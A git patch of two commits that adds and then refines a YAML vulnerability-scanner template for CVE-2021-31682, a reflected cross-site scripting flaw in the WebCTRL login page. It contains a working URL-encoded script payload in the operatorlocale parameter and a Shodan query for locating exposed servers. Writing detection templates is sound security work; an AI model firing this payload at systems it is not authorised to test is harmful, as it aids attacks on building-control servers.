From 43629d5f49663f139aac3c5060d23af4904683c1 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 30 Oct 2021 19:04:42 +0900 Subject: [PATCH 1/2] Create CVE-2021-31682.yaml The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-31682.yaml | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2021/CVE-2021-31682.yaml diff --git a/cves/2021/CVE-2021-31682.yaml b/cves/2021/CVE-2021-31682.yaml new file mode 100644 index 0000000000..b17547ac27 --- /dev/null +++ b/cves/2021/CVE-2021-31682.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-31682 + +info: + name: WebCTRL OEM - Reflected XSS + author: gy741,dhiyaneshDk + severity: medium + description: The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-31682 + - https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-31682 + cwe-id: CWE-79 + tags: cve,cve2021,webctrl,xss + metadata: + shodan-query: 'html:"/_common/lvl5/dologin.jsp"' + +requests: + - method: GET + path: + - '{{BaseURL}}/index.jsp?operatorlocale=en/%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%20' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - ">" + part: body + + - type: word + words: + - "text/html" + part: header From fe6dbc8b4dc326b74158a198bc9c5884c44593ac Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 31 Oct 2021 16:56:16 +0530 Subject: [PATCH 2/2] misc update --- cves/2021/CVE-2021-31682.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-31682.yaml b/cves/2021/CVE-2021-31682.yaml index b17547ac27..cde1a07b90 100644 --- a/cves/2021/CVE-2021-31682.yaml +++ b/cves/2021/CVE-2021-31682.yaml @@ -20,7 +20,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/index.jsp?operatorlocale=en/%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%20' + - '{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' matchers-condition: and matchers: @@ -29,11 +29,13 @@ requests: - 200 - type: word - words: - - ">" part: body + condition: and + words: + - '">' + - 'common/lvl5' - type: word + part: header words: - "text/html" - part: header